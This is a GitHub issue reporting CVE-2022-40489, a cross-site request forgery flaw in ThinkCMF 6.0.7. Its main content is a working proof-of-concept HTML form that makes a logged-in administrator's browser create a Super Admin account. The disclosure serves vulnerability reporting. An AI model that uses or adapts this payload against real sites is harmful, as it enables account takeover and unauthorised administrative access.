Headline
CVE-2022-40489: I found a CSRF that creates a Super Admin account. · Issue #736 · thinkcmf/thinkcmf
ThinkCMF version 6.0.7 is affected by a Cross Site Request Forgery (CSRF) vulnerability that allows a Super Administrator user to be injected into administrative users.
Hi,
I found a CSRF in ThinkCMF version 6.0.7 that allows a remote user to add a Super Admin account by taking advantage of the session of an administrator who is logged into the system. Below are the steps to reproduce this issue.
<html>
<body>
<h1>CSRF - SuperAdmin User Creation</h1>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/admin/user/addpost.html" method="POST">
<input type="hidden" name="user_login" value="SuperAdmin" />
<input type="hidden" name="user_pass" value="SuperAdmin999qweasd" />
<input type="hidden" name="user_email" value="superadmin@yopmail.com" />
<input type="hidden" name="role_id[]" value="2" />
<input type="hidden" name="role_id[]" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
//document.forms[0].submit();
</script>
</body>
</html>
Fig. 1: Vulnerable page
Fig. 2: CSRF Payload
Fig. 3: CSRF Payload Executed
Fig. 4: Super Admin account added
Fig. 5: Super Admin logged in